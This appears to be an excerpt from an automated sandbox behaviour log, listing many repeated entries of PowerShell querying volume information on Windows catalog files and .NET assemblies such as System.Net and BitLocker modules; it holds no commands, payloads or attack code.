Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
